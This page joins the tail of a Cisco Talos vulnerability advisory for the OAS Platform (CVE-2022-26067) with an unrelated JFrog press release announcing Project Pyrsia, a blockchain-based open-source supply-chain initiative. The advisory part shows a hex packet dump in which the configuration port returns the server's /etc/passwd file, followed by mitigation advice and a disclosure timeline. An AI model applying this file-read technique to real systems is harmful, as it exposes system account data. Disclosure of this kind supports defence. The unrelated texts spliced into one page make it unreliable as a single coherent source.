    0020   0a 6a e5 67 c4 e4 94 6c 24 2e c9 f5 cd ff 80 18   .j.g...l$.......
    0030   01 fc a0 c3 00 00 01 01 08 0a d6 18 2b 3c bb 15   ............+<..
    0040   e8 9d 00 00 00 00 00 44 a5 40 00 01 00 00 00 ff   .......D.@......
    0050   ff ff ff 01 00 00 00 00 00 00 00 10 01 00 00 00   ................
    0060   02 00 00 00 06 02 00 00 00 07 53 75 63 63 65 73   ..........Succes
    0070   73 09 03 00 00 00 10 03 00 00 00 01 00 00 00 09   s...............
    0080   04 00 00 00 10 04 00 00 00 03 00 00 00 08 08 01   ................
    0090   00 00 00 06 05 00 00 00 0b 2f 65 74 63 2f 70 61   ........./etc/pa
    00a0   73 73 77 64 09 06 00 00 00 0f 06 00 00 00 38 0a   sswd..........8.
    00b0   00 00 02 72 6f 6f 74 3a 78 3a 30 3a 30 3a 72 6f   ...root:x:0:0:ro
    00c0   6f 74 3a 2f 72 6f 6f 74 3a 2f 62 69 6e 2f 62 61   ot:/root:/bin/ba
    00d0   73 68 0a 64 61 65 6d 6f 6e 3a 78 3a 31 3a 31 3a   sh.daemon:x:1:1:
    00e0   64 61 65 6d 6f 6e 3a 2f 75 73 72 2f 73 62 69 6e   daemon:/usr/sbin
    00f0   3a 2f 75 73 72 2f 73 62 69 6e 2f 6e 6f 6c 6f 67   :/usr/sbin/nolog
    0100   69 6e 0a 62 69 6e 3a 78 3a 32 3a 32 3a 62 69 6e   in.bin:x:2:2:bin
    

**Mitigation**

The easiest way to mitigate attempts to exploit this vulnerability is to prevent access to the configuration port (TCP/58727 by default) when not actively configuring the OAS Platform. Additionally, use a dedicated user account to run the OAS Platform and ensure that user account does not have any more permissions than absolutely necessary.

**Timeline**

2022-03-16 - Vendor Disclosure  
2022-05-22 - Vendor Patch Release  
2022-05-25 - Public Release  

Discovered by Jared Rittle of Cisco Talos.

CVE-2022-26067: TALOS-2022-1492 || Cisco Talos Intelligence Group

Open source software community initiative utilizes blockchain technology.

**Sunnyvale & San Diego, Calif., May 25, 2022** — (swampUP 2022) – JFrog Ltd. (“JFrog”) (NASDAQ: FROG), the Liquid Software company and creators of the JFrog DevOps Platform, today introduced Project Pyrsia, an open-source software community initiative that utilizes blockchain technology to secure software packages (A.K.A Binaries) from vulnerabilities and malicious code. Available for sign-ups immediately, Project Pyrsia is an open-source-based, decentralized, secure build network and software package repository aimed at helping developers establish chain of provenance for their software components, creating greater confidence and trust.

“Open-source is everywhere, and while it has always been seen as a seed for innovation and modernization, the recent rise of software supply chain attacks has made every organization vulnerable,” said Shlomi Ben Haim, Co-Founder and CEO, JFrog. “Led by developers and for developers, JFrog is proud to work with the community on developing Project Pyrsia so everyone can continue to embrace open source with confidence, while protecting the software supply chain.”

Open-source software is a critical element of nearly every technology we use today – from our operating systems and browsers to the applications and services on which we depend to run our lives. Yet there’s no question the volume, sophistication and severity of software supply chain attacks has increased in the last year. In recent months the JFrog Security Research team tracked over 20 different open-source software supply chain attacks – two of which were zero-day threats. While open-source components are designed to make development more efficient, not knowing where your software comes from makes it hard-to-spot risks–seeding doubt and uncertainty about its safety.

Thus, JFrog and other open-source technology leaders, including Docker, DeployHub, Futureway, and Oracle – worked together to establish the Project Pyrsia network for validating the source and security of open-source software packages. With Pyrsia, developers can confidently use open-source software knowing their components have not been compromised, without needing to build, maintain, or operate complex processes for securely managing dependencies.

“At JFrog we believe open-source security will only be successful if we provide the community with the same tools and services that are available to enterprises,” said Stephen Chin, VP of Developer Relations, JFrog. “The combination of an open-source, customizable architecture, and a robust, active community makes Pyrsia the most transparent and trustworthy way to obtain secure software packages. We’re grateful for the help of our industry partners and the community for joining us in securing open source so it can remain a true fountain of innovation.”

Pyrsia aims to seamlessly integrate with the package management systems developers are already using today, so they can certify their software components without foregoing compatibility, security, or efficiency. Utilizing standards like Sigstore’s Cosign and Notary V2 allows developers to quickly access their containers leveraging the Pyrsia network. Using digital signatures, developers receive an immutable chain of evidence for their code, providing peace of mind from knowing the exact source of their packages.

To help guide developers on the process of using Pyrsia for validating software components, a select few entities will build and publish images that will be available for everyone’s use -otherwise known as ‘bootstrapping’ the project. Organizations interested in supporting Pyrsia can volunteer their resources to help establish the project’s first distributed network. From there, Project Pyrsia’s decentralized framework will help provide:

· An independent, secure build network for open-source software

· Trustworthiness of software packages

· Completeness of known open-source software dependencies

For more information on Project Pyrsia or to sign-up to be a contributor visit https://pyrsia.io/. You can also learn more about the project in this blog or chat directly with JFrog Community leaders and Project Pyrsia experts during swampUP 2022 taking place in San Diego, May 25 – 26. For more information and to register visit https://swampup.jfrog.com/.

**Supporting Quotes from Industry Partners**

_“The DeployHub team’s focus is firmly rooted in securing the supply chain, and there is no better place to start than fully auditing the build and package step. To that end, Pyrsia is the first open-source project to introduce improvements in this area via a ‘consensus build network.’ Disruption in this area is long overdue. DeployHub is proud to be part of this innovative team.” – Steve Taylor, CTO DeployHub, Inc._

_“At Docker we feel this is an exciting time for the community to work together on innovation around the supply chain and its core, critical components for build and packaging. We are excited to join and work together with the community on Project Pyrsia. There is a huge opportunity to build new kinds of infrastructure over the core container primitives that will foster innovation and better developer experiences.” – Justin Cormack, CTO, Docker_

_“Open-source project Pyrsia is developing a third-party attested, decentralized, distributed software package network that delivers secure, transparency and integrity for the open-source software package supply chain. Futurewei is committed to collaborating with open-source communities to accelerate the innovations for digital transformation via open-source, open standard, and open ecosystems. As open-source software becomes more pervasive, securing the open-source software supply chain becomes a critical issue. We are thrilled to be a founding member of Project Pyrsia and delighted to have the opportunity to collaborate with other members to accelerate Pyrsia for a secure and trusted open-source software supply chain ecosystem – bringing value to the open-source community.”– David Lai, Director, Cloud Infrastructure and Platform Architecture Open-Source Ecosystem Partnerships, Futurewei Technologies, Inc._

Tag

#mac